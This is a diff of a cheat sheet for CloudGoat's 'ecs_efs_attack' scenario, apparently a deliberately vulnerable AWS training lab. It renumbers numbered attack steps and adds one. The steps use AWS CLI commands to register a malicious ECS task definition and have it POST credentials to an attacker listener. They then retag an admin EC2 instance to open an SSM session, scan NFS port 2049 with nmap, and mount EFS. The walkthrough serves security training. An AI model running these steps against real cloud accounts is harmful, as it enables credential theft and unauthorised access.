RhinoSecurityLabs/cloudgoat/scenarios/ecs_efs_attack/cheat_sheet.md

     `register-task-definition --cli-input-json file://task_template.json  --profile ruse`

+11. Update the ECS service with the newly registered task definition.

+    `aws ecs update-service --cluster <CLUSTER NAME> --service <SERVICE NAME> --task-definition <NEW TASK DEFINITION NAME>`

-11. Wait for the task to run and POST the credentials to your listener
+12. Wait for the task to run and POST the credentials to your listener

-12. With the new creds add them to "ruse_box"
+13. With the new creds add them to "ruse_box"

     `aws configure --profile ecs`

-13. Modify admin ec2 tags
+14. Modify admin ec2 tags

     `aws ec2 create-tags --resources <INSTANCE ID> --tags Key=StartSession,Value=true`

-14. Using ecs creds start a session on admin ec2
+15. Using ecs creds start a session on admin ec2

     `aws ssm start-session --target <INSTANCE ID> --profile ecs`

-15. Looking at the ec2 instances we see the admin ec2 only has a single port open.
+16. Looking at the ec2 instances we see the admin ec2 only has a single port open.
 We Nmap scan this port.

     `nmap -Pn -P 2049 --open 10.10.10.0/24 `

-16. Mount discovered ec2
+17. Mount discovered ec2

     `cd /mnt`
 `sudo mkdir /efs`